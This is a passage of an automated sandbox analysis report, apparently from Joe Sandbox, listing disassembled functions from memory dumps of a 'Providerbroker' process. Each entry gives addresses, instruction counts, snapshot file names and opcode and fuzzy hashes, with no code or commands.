Instruction Fuzzy Hash: 10517230D0C58A9FEB69EF98C8585FDB7B1FF45344F2541BAC01AE7292CA396905CB50

Function 00007FF8495928E8 Relevance: 1.4, Strings: 1, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 00007FF849592962

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: c6174ed676797a1beadd7897fba3d7044ec3e6b70ce13ad9a9f3918cca6533c2
Instruction ID: d9893b44a67428d35c0261895ee76881aacf8f84119b1e694f0bf6fdc6fb5b58
Opcode Fuzzy Hash: c6174ed676797a1beadd7897fba3d7044ec3e6b70ce13ad9a9f3918cca6533c2
Instruction Fuzzy Hash: 94515F31D0C68A9FEB69EFA8D8545BDB7B1FF58344F2140BAC01AE7282CA746941CB50

Function 00007FF84903EBC9 Relevance: 1.4, APIs: 1, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNEL32 ref: 00007FF84903ECA1

Memory Dump Source

Source File: 00000005.00000002.2243679796.00007FF849030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849030000_Providerbroker.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: baf25c6622c65f48bb16c1a4b4aa3b2e82d1816a7e8c390b1ccb2579a28c6af8
Instruction ID: 420bb106bc39445afdeb2b573e7dded98a1de6b47a76079aac7795c5cdd213c5
Opcode Fuzzy Hash: baf25c6622c65f48bb16c1a4b4aa3b2e82d1816a7e8c390b1ccb2579a28c6af8
Instruction Fuzzy Hash: BE414C30D0865C8FDB59EFA8D889BEDBBF0FB56311F14416AD44DE7292DA349885CB01

Function 00007FF84959C415 Relevance: 1.4, Strings: 1, Instructions: 117
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

H{lI, xrefs: 00007FF84959C50C

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID: H{lI
API String ID: 0-3775460832
Opcode ID: 5ca2e9633ece0c5d0aa323ae08037bad8f42b020b964a3ac27c74f95996a3256
Instruction ID: 42828ce0f1ba476575503d1ef28a7da00b2e14592beecfba736307700f3f7364
Opcode Fuzzy Hash: 5ca2e9633ece0c5d0aa323ae08037bad8f42b020b964a3ac27c74f95996a3256
Instruction Fuzzy Hash: AF415CB1E1C99E9EEBA4EF58C8416FDBBB1FF94355F610035D01ED3295EA3468418B40

Function 00007FF84959CB05 Relevance: 1.3, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PcI, xrefs: 00007FF84959CB59

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID: PcI
API String ID: 0-2756192865
Opcode ID: 8537a16d46d07b678e590a12dbc284aebae59994001dbb239c3c1754a516b509
Instruction ID: 8a6e9acab901009ae903168040488f507b8448b0ed33f30082bf1a0a6cf639bb
Opcode Fuzzy Hash: 8537a16d46d07b678e590a12dbc284aebae59994001dbb239c3c1754a516b509
Instruction Fuzzy Hash: DA31AC71D1C98D8FEBA5EF64C8505ECBBB2FF59344F6500AAC00EE7292DA24A804CB10

Function 00007FF848E91E9C Relevance: 1.3, Strings: 1, Instructions: 16
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0, xrefs: 00007FF848E91EC9

Memory Dump Source

Source File: 00000005.00000002.2241317098.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e90000_Providerbroker.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 0f2e91487e03f267337135b2cd771ab139e2324e8c5ce879cd162866382f69ff
Instruction ID: 81d380ec11ada29e938540b454f0fe55211349737c44c8f63b517ec826274206
Opcode Fuzzy Hash: 0f2e91487e03f267337135b2cd771ab139e2324e8c5ce879cd162866382f69ff
Instruction Fuzzy Hash: 41E0EC30D5852F8AEB64EB60C8557FDB2A1EF94344F4181FB802FE2595CF752A809E41

Function 00007FF84959AD10 Relevance: .7, Instructions: 692COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e37841f5cd7e681e0b506e0deb0787de3b2dce6204a0f77308560d7e7ab8f0ba
Instruction ID: 1bf0311f8cfed7b8db072f945cbcb387a2879ba6bc26d07a2626c3231affad41
Opcode Fuzzy Hash: e37841f5cd7e681e0b506e0deb0787de3b2dce6204a0f77308560d7e7ab8f0ba
Instruction Fuzzy Hash: 52329430A1CA598FFBA8EF18D895A7877E2FF54354F2141B9D01EC7292DE24AC45CB81

Function 00007FF8495D4828 Relevance: .6, Instructions: 571COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c693f4372495c8af45244181a473d03ffab0be5d745ebfa4cc8342a6856bad7
Instruction ID: 395bad8ae9da1cd0c5d8de97ae3b4bc627e3cc8cb0fdd50ebddc3071c50e3a13
Opcode Fuzzy Hash: 7c693f4372495c8af45244181a473d03ffab0be5d745ebfa4cc8342a6856bad7
Instruction Fuzzy Hash: 73227E30D1C5998FEB69EF18C8906B877B5FF54340F6582BDC46AD72C6DA38A981CB40

Function 00007FF849593BA1 Relevance: .4, Instructions: 409COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5f8df75c673f6139a57c7b6c0ac633c732f3be75ad81bf124cc32c34abdab02
Instruction ID: 423ff771e35922a71b4ac226e52f2c3e11818c310e8881b5e1149ceec073cefa
Opcode Fuzzy Hash: c5f8df75c673f6139a57c7b6c0ac633c732f3be75ad81bf124cc32c34abdab02
Instruction Fuzzy Hash: 67D1E33090CB86CFE378EF18D89517577E1FF44398B2545BEC46AC36A2DA39B8428781

Function 00007FF84959BB37 Relevance: .4, Instructions: 367COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dada3a16cf25853faf72ee083de77e1298674e57671b2d552e6af0301e2792a
Instruction ID: d533f5a64643f3ea8b05f4d8c5ff6942b63b958a62151bcf576751fa4e9c4421
Opcode Fuzzy Hash: 7dada3a16cf25853faf72ee083de77e1298674e57671b2d552e6af0301e2792a
Instruction Fuzzy Hash: 9841FB71D4DA9ADFF768BF58A8412F877A0EF04398F29417AD01DC61C3CE2868008B89

Function 00007FF84959EC8F Relevance: .4, Instructions: 356COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5051b49f4e1b451923b799c78badc543acc1d2cfb670412cb797918a7d12073f
Instruction ID: 3fd9822101227ef7093d359b68bc1159a269846b92d8bf048ecd15dcfbfe02ab
Opcode Fuzzy Hash: 5051b49f4e1b451923b799c78badc543acc1d2cfb670412cb797918a7d12073f
Instruction Fuzzy Hash: 89D1D1305186968FFB59DF08C8D46B13BA1FF45304B6546BDD85B8B68BCA38F885CB80

Function 00007FF84959E542 Relevance: .3, Instructions: 324COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e958f821688fd5aac1a74725b5046266b6829ae203c7427c0b345f5780530f71
Instruction ID: e5fa25125db90fd0a33229fddfc94b8c9cffe24610569ff1d6c85fa2792874f5
Opcode Fuzzy Hash: e958f821688fd5aac1a74725b5046266b6829ae203c7427c0b345f5780530f71
Instruction Fuzzy Hash: 1DC10330A0CA868FF759EF18D8986B1B7A1FF49344F254179C05EC7A86CB28F855CB81

Function 00007FF849592412 Relevance: .3, Instructions: 324COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c2e545528580ca044c50800af8a8f4013aab43c3413bf3c6a159c3f8c283cb8
Instruction ID: bf5523af300a477f84aa3131e77ee2fa204dfd11aa7ede45f96b8e9c553ed661
Opcode Fuzzy Hash: 3c2e545528580ca044c50800af8a8f4013aab43c3413bf3c6a159c3f8c283cb8
Instruction Fuzzy Hash: 4FB1F53090DA868FE759EF28E8906B4B7A1FF58344F654179C05EC7A86DF28B851CB81

Function 00007FF84959ECAF Relevance: .3, Instructions: 318COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5af7c358c9d5a7e7ffb26785d24a0f57d4c9134b7ee65f5da3e118bcd74700d5
Instruction ID: 1d0c79a003c868497c3aba74126e2c97bbfc54731a9f20a5bdc5dfcae262a405
Opcode Fuzzy Hash: 5af7c358c9d5a7e7ffb26785d24a0f57d4c9134b7ee65f5da3e118bcd74700d5
Instruction Fuzzy Hash: 26C1AF305186868FEB29DF18C8E45B237A1FF45348B6545BDD85B8B68BCA38F885CB41

Function 00007FF8495A1577 Relevance: .3, Instructions: 305COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78f92479642af6c5cba55b517fd98781fc540d7effe3f08a5e1e0e9f6e0f7b55
Instruction ID: 4d363306ae23fed542bb155b2aa7b84d70fcaf12fb010ec11912e8da39160273
Opcode Fuzzy Hash: 78f92479642af6c5cba55b517fd98781fc540d7effe3f08a5e1e0e9f6e0f7b55
Instruction Fuzzy Hash: F021D162D0D7D79EF2797E647C218B96690AF143F0F3A167AC42E464C2DD0C2C415B9E

Function 00007FF84959DA86 Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc6866d9688a75fd64660c1d73644b4e06b4ba11c9520eba57dc490f6f4fb03a
Instruction ID: 9b935acc7fc9f438dcf0c2d8a88ba7143a1cb6b1983ef0fa173327502999ba20
Opcode Fuzzy Hash: bc6866d9688a75fd64660c1d73644b4e06b4ba11c9520eba57dc490f6f4fb03a
Instruction Fuzzy Hash: B4815731A1CA868FF3387E28984117573E5EF55398F26057EE4AFC7182DE2DB8028B55

Function 00007FF849591946 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 397a333a347ecbce93406a283de9754dc88609719450c261c97150473f01fa9a
Instruction ID: 3f64415110017b5f05aef2ceefbdf6f869d037e49b405cc3c917585d4b13eb9a
Opcode Fuzzy Hash: 397a333a347ecbce93406a283de9754dc88609719450c261c97150473f01fa9a
Instruction Fuzzy Hash: 96812731A0CA954FF7387F1898459B977E1EF41398F26057ED0AFC3182DE29B8028756

Function 00007FF84959AAFB Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47cd2991cb1f496bf0baacff2a8a32d602030b416d283f01da9e1ffdd4da3eca
Instruction ID: 9f3501f33de433be34023d3efe801b16c42966287d5b58fe5222674d4c6bc3d6
Opcode Fuzzy Hash: 47cd2991cb1f496bf0baacff2a8a32d602030b416d283f01da9e1ffdd4da3eca
Instruction Fuzzy Hash: 7E81BF30D1C58A8FFBA9EF6888556BCBBB2FF45388F250479D01ED7182DE286841C760

Function 00007FF84959B7FD Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f28a7884855d03a75f120a1f4db2ee5a7e1c17ce6eda9cc9431ee0186db4466a
Instruction ID: 31e1893f1a8a73aa516071ae84ae4d6bf1127c5f4126880d90ecbc21fcf49a73
Opcode Fuzzy Hash: f28a7884855d03a75f120a1f4db2ee5a7e1c17ce6eda9cc9431ee0186db4466a
Instruction Fuzzy Hash: B661153191C4CD4FF778FE1C8C565B837D0EF89364F2602B9D4AEC75A2DA18A9068781

Function 00007FF8495A1DEB Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ced9fd856ed37cc0550ef5ffbb8736129a72ecada39be8913a817bc9e66cbd67
Instruction ID: 1a21e520b6f8d54fdea4e3817be5922e549e142d9a86395ade5623882b41c24e
Opcode Fuzzy Hash: ced9fd856ed37cc0550ef5ffbb8736129a72ecada39be8913a817bc9e66cbd67
Instruction Fuzzy Hash: 0E81B030D1D68E9EEBA4FF649854ABCBBA1FF45390F25007AD01ED7182DF286841C755

Function 00007FF84959FCD1 Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bb005661f45a424b1ac91adebccb19309c6697346ceae4ba567c3e3fc278901
Instruction ID: 1e8c26f67e50814eb44cfc8652e8901fb3e9912a088b23a2239b56248b8bb990
Opcode Fuzzy Hash: 6bb005661f45a424b1ac91adebccb19309c6697346ceae4ba567c3e3fc278901
Instruction Fuzzy Hash: CC81B13095CB868FF3A8EF18D88457177E1FF45348B25457DC8AA87A92CB29BC42CB40

Function 00007FF849592EF0 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a0dccdab7a3f90608840b0e759a47d7031cf110a19793f54d44870e379fe128
Instruction ID: f78bc6ca8d3028cbb2572f86b5e5cf4fa926b8189a434d7566decccdf41e0571
Opcode Fuzzy Hash: 6a0dccdab7a3f90608840b0e759a47d7031cf110a19793f54d44870e379fe128
Instruction Fuzzy Hash: 8851D230D1C99A8EFB6CAB2888666B877E1FF55344F2581F9C05EC7186DE3869848741

Function 00007FF848E9090D Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2241317098.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e90000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bacc519803b4fc86bbbfec75d312680bafb963c364e3fa38316f36712c812359
Instruction ID: 80b164753967896f73d2a92d6e805353c79cba8c6947550fc160ef6f9fe49ff9
Opcode Fuzzy Hash: bacc519803b4fc86bbbfec75d312680bafb963c364e3fa38316f36712c812359
Instruction Fuzzy Hash: 3A51AC71948A499FDB48FFA8E4956FCBBA0FF48350F14057AD00DD7296DB34A891CB84

Function 00007FF8495A8A1E Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6abfa50b23a635370fa6267b25ddeca2b3253624e53213e6a9487917197fccf
Instruction ID: 24193874c0138d0b3fcc1861348ef2c328118b262e23f8b1e21573dbaf39fc70
Opcode Fuzzy Hash: b6abfa50b23a635370fa6267b25ddeca2b3253624e53213e6a9487917197fccf
Instruction Fuzzy Hash: 4F31C171A1C7458FE77C6E1CAC4507973D9EF953F0B32153EE6AFC2182D929A802468A

Function 00007FF848E90960 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2241317098.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e90000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cb14db7d391cf80bb343da20f010636f99645597fd74a72df0ccbfd575c8714
Instruction ID: aa3a2b78d1a096adce517f743fff3a17c1f9d33bfba1baa3c9fa1d0236a8e6a6
Opcode Fuzzy Hash: 8cb14db7d391cf80bb343da20f010636f99645597fd74a72df0ccbfd575c8714
Instruction Fuzzy Hash: 06415B70908A0D9FDB48FF98E495AECB7A1FF58351F14017AD40DD3296DF34A8418B94

Function 00007FF848E90905 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2241317098.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e90000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0abc774098416356dee1def43f7abca88ac204ccb848ee5d1bd989baf572d4e2
Instruction ID: c787d4820644f8b95501c4f0818b2dd0067b9c012716759582a1cf2f4b296e67
Opcode Fuzzy Hash: 0abc774098416356dee1def43f7abca88ac204ccb848ee5d1bd989baf572d4e2
Instruction Fuzzy Hash: 5D516A74A08A0E9FCF84EF58D484AED7BF1FF58355F050169E419E7260DB34E9908B94

Function 00007FF84959B46C Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4fed93ef907dea418af7e9625d87b8b08bdddf00b7716162509137a6e53ab7e
Instruction ID: 9db56fd578adaf80d8d0b3d7a7e4b6834bbc1edbb2172c5b798cdab9af99ac39
Opcode Fuzzy Hash: a4fed93ef907dea418af7e9625d87b8b08bdddf00b7716162509137a6e53ab7e
Instruction Fuzzy Hash: F141063184E3C98FF713AB34AC156F93FA0EF43368F1901EAD099CA0A3E6695516C752

Function 00007FF84959F020 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72cb3e768103569acb77560856180933aadc175963492d5d9a314a68410ea9cd
Instruction ID: 8f4253851eac11edd90746fa6d76886dbe8fc471867c368f0f89d0df635d499e
Opcode Fuzzy Hash: 72cb3e768103569acb77560856180933aadc175963492d5d9a314a68410ea9cd
Instruction Fuzzy Hash: 8941E330D5C9AE8EFB78EB1888547B8B7A1FF54344F2585B9C45EC7186CE386D858740

Function 00007FF8495D49A0 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee3c3b6d39ba5e99fedb8753fe67aba0eb2c7337fdc1e705debc7db7688d3386
Instruction ID: 07f9fd6231f12d1cdc667acafec0537f716a12da1c0b9b24238695ad0a77d164
Opcode Fuzzy Hash: ee3c3b6d39ba5e99fedb8753fe67aba0eb2c7337fdc1e705debc7db7688d3386
Instruction Fuzzy Hash: 5341B430D1C99A8EF778EF1488946B477A2FF54340F2582B9D06EC71C6CA38A9858B80

Function 00007FF8495A0287 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1c770e91bd1d9bc5a703c48291592a366639a346b66663f0e754fb132d14350
Instruction ID: 1eee77472aa928fb1aad4aa2e3bbd993efd26e0b0b9208318df374f83df1721a
Opcode Fuzzy Hash: a1c770e91bd1d9bc5a703c48291592a366639a346b66663f0e754fb132d14350
Instruction Fuzzy Hash: 8F419231A0CA498FDF98FF28D495DA4B3E1FF69324B1401AAD40ED3292CE35E845CB85

Function 00007FF8495941C7 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c69a5c60433f56a4f515bd3e6bfe01894198bf0408f5bf1cb43dde94a5e63f3d
Instruction ID: 6926d9ec652c207eefceb7015d31e2667a3ad2b755337c272aaf77cfea10a46b
Opcode Fuzzy Hash: c69a5c60433f56a4f515bd3e6bfe01894198bf0408f5bf1cb43dde94a5e63f3d
Instruction Fuzzy Hash: E641843160CA598FDF98FF28D465AA577E1FB68324F1401AAD00EC3282CE35ED45CB81

Function 00007FF849594271 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf17601a9f3a8c42874ce08979a714ea604020c706bf92da31efbb43c3d8697f
Instruction ID: 0f86e9739d51ef04680cb38f24f38b93996b98be452ea13b6c0054e80d145161
Opcode Fuzzy Hash: bf17601a9f3a8c42874ce08979a714ea604020c706bf92da31efbb43c3d8697f
Instruction Fuzzy Hash: E0316F31A0CA558FDB9CEF28C465AA477E1FB68314F1402A9D04EC7292CE34ED45CB81

Function 00007FF8495A0331 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c709304e838e99f9e7efeaed4536c20ceca864cff1d4ed37458be424ce0ac064
Instruction ID: 226269268ba87d90ae54c8e36ed31dcb54a69d842ca6898d3d947617dba79c56
Opcode Fuzzy Hash: c709304e838e99f9e7efeaed4536c20ceca864cff1d4ed37458be424ce0ac064
Instruction Fuzzy Hash: A4317031A0CA498FDB9CEF28C4A5DA4B7E1FB69314B1402EAD41EC7193CE24E845CB85

Function 00007FF84959420B Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c4782a1888eefc7de995904dd9153a21bb67f187824a876a646b7e2821282b9
Instruction ID: d8e3d14b36ed7e7f6dc68c7cefe9e2cf2a16c313148412b85a2b02abe6c0f088
Opcode Fuzzy Hash: 1c4782a1888eefc7de995904dd9153a21bb67f187824a876a646b7e2821282b9
Instruction Fuzzy Hash: F931413160CA558FDBACEF28C465AA577E1FB68314F1442ADD00EC7292DE39ED45CB81

Function 00007FF8495A02CB Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df504c8b88c62bced0f99b1b564ddac0e8e3bdc9ddaeee2a9c73d58086fb737a
Instruction ID: ea4747c62ca9f870199a4625dce09197897bdaee6c055436a0238a90037a17d2
Opcode Fuzzy Hash: df504c8b88c62bced0f99b1b564ddac0e8e3bdc9ddaeee2a9c73d58086fb737a
Instruction Fuzzy Hash: 19316031A0CA499FDB98FF28C4A5DA4B7E1FB69314B1401EAD40ED7292CE34E845CB85

Function 00007FF848E90998 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2241317098.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e90000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 433714b8f46b58d74693557872ede64aa95e9f8c99e04f385b1dabc79ccec758
Instruction ID: 3899f107ae9a2d0a7a7b4299fa8cd1c31fbc9495eff5d980cd3263f1ab4f031d
Opcode Fuzzy Hash: 433714b8f46b58d74693557872ede64aa95e9f8c99e04f385b1dabc79ccec758
Instruction Fuzzy Hash: 0F41F770A18A0D9FDB84EF98D495AEDBBF1FF58741F10016AE40DE3295DB34A8518B44

Function 00007FF84959B4AA Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
